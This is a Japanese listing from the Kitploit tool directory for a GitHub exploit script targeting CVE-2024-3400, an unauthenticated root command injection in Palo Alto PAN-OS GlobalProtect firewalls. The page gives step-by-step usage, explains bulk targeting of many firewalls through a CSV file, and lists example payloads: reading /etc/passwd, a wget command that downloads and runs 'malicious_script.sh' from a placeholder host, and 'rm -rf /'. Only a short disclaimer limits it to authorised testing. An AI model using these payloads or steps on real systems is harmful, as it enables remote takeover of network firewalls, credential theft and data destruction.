Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-3400 — CVE-2024-3400のエクスプロイトスクリプト。Palo Alto Networks PAN-OS GlobalProtectにおけるコマンドインジェクションの脆弱性で、認証なしでのルート権限によるリモートコード実行を可能にします。 | Kitploit
ツール/GitHubGitHub/yuvvi01/cve-2024-3400
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

CVE-2024-3400のエクスプロイトスクリプト。Palo Alto Networks PAN-OS GlobalProtectにおけるコマンドインジェクションの脆弱性で、認証なしでのルート権限によるリモートコード実行を可能にします。

リポジトリを見る
1152年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PAN-OS ファイアウォール エクスプロイト スクリプト

このスクリプトは、PAN-OS ファイアウォールの脆弱性を悪用するデモを目的としています。特別に細工されたペイロードをファイアウォールのAPIエンドポイントに送信し、任意のコマンドを実行します。このエクスプロイトは、特定のPAN-OSバージョン向けのPalo Alto Networks PAN-OSソフトウェアのGlobalProtect機能におけるコマンドインジェクションの脆弱性であるCVE-2024-3400を標的にしています。特定の機能構成により、認証されていない攻撃者がファイアウォール上でroot権限で任意のコードを実行できる可能性があります。

注: このスクリプトは、法的かつ倫理的な目的でのみ、テストする許可を得たマシンでのみ使用してください。

使用法

このプロジェクトを使用するには、次の手順に従ってください:

  1. このリポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. リポジトリのディレクトリに移動します:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. 必要なモジュールをインストールします:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Pythonスクリプトを実行します:
    root@kitploit:~
    python3 exploit.py
    

プロンプトに従って、脆弱なPAN-OSファイアウォールのIPアドレスと実行するペイロードを入力します。

ペイロードの例

  1. ディレクトリの内容を一覧表示:
    root@kitploit:~
    ls -la
    
    
  2. 特定のファイルの内容を表示:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. 現在ログインしているユーザーのユーザー名を表示:
    root@kitploit:~
    whoami
    
    
  4. インターネットからファイルをダウンロード(wgetまたはcurlがインストールされている必要があります):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. これは非常に注意してください:
    root@kitploit:~
    rm -rf /
    

安全な使用のための手順

SSL証明書の検証

スクリプトは、PAN-OSファイアウォールサーバーからSSL証明書のファイルパスを尋ねます。パスが指定されていない場合、スクリプトは自動的にSSL検証をfalseに設定し、実質的にSSLを無効にします。

CSVファイルの手順

このスクリプトを使用すると、CSVファイルを使って脆弱なPAN-OSファイアウォールの複数のターゲットを悪用できます。以下は、CSVファイルを正しくフォーマットするための手順です:

CSVファイルの形式

CSVファイルには3つの列が必要です:

ipaddress: 脆弱なPAN-OSファイアウォールのIPアドレス。 payload: ファイアウォール上で実行するペイロード。 path/to/root_CA_certificate.pem: ルートCA証明書へのパス(証明書検証が無効の場合は空白のままにします)。

  • CSVファイルの例:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

手順:

指定された形式でCSVファイルを作成します。 IPアドレス、ペイロード、およびルートCA証明書のパス(該当する場合)を入力します。 ルートCA証明書への有効なパスを指定するか、証明書検証が無効の場合はフィールドを空白のままにしてください。 スクリプトを実行し、プロンプトが表示されたらCSVファイルを使用するオプションを選択します。

参考文献

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
ツールをダウンロード